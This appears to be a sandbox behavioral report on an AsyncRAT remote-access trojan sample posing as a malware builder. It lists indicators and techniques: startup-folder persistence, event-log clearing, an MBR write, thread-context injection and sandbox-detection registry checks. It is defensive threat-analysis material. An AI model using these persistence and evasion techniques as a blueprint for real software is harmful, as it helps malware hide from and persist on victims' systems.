asyncrat | c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 43 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe

Drops startup file 40 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe

Executes dropped EXE 1 IoCs

pid	Process
2500	Stub.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 4 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 16 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\kpkopw.exe	Explorer.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2500 set thread context of 3784	2500	Stub.exe	87

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02oqduuijzvltxfy	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId = "02zffscyanttqogt"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184011ADE07956"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004c4b263ce3325643a89d57a9b6291f6800000000020000000000106600000001000020000000a647653a5dcb2c97ac070e9e1e3edf8b3d645c52f06f0b2068110287e8006ba6000000000e8000000002000020000000cf6c3281d598bf19bfe380b14913891f6bf953674d910edb0a69e90b8b79f346b0030000bc469da87701c33b2cfd142ad2c2be3107db4c510f8cf66e042c3898a6770302b57e5994c6bd6cda4eb2325191199f1237fe3a4ba2a0d4e13eb589fc62d9c7c4d94b559fdbc1e77e7d7abf1bbf614c6ca0a90101f607cc3d12dc762aec6b93c4d3ba781912a4605558c54410be41aa08b478d8d50efa0015ca72e3912f7b78bfaf7a01d91767b07a859434136bf93437c81419b29c63f8c09245a4179c4ac39498c3eef3479be17ccda03dcc282d925bb7bff5170e75428e04c46aeb8ea4d617ed8e9068b8de53bc2bf0fd89e8beade6fac2dddeffd07849deee1d0eedf6a80e9ff91f447fa0162e5b0e3db8a205f00b8ef80623e38ceebdaa57ea094df654de1f435f7210ec3ef558a50f7b6259ba1b75d75a9a3d4a1e9a9b7da443db0aa172fe5f568e09ab46d4c637cf850e586fd515d1ee4d36aab80452cdf381c9fba59dede3678bee8406b9647ff63d6af5e2d059d06728f1fdc0c603b8d313507667942b14a552fd83b5193468e01944a4f5f0cec571f1b88209bf8b350fc4e475889474218b3c474c1b153b772e7cf91b8018d4972383643ca208c5ddba6b92a229d79d5c75baca1193b0cafded76f0860571259ec7c276bd9b293199ef428e8f427bb329187c42960d2b6db62c781e57364cbbfb72156de6b683b307e82a81f0a9a5c834185007bf48d357f83c110dde9f18952387fa3ab50a55ac1512aeef3f7ba4ff9c827de91a0b348b166f2dc747d58b67f7e4e53e938f743ca2368cb599ec080b6d1913b4daa5a4268bc69174c34547b859297af4f97cb0c513b272643422ac846f4cd7dbfe528eb45ad7f747a43db9e26daa6ad81bfcad7e5b1cba02108197232d33a25889885b70f4575d4f3efe3c657d645b4f11e4900f8b9efed24125aa972023d9ccbe88dce2e3469537baf986c0d71065a3e4a672eb8c281dc84d18f7a754d8b34c1387ac879e44b5c5353afdcb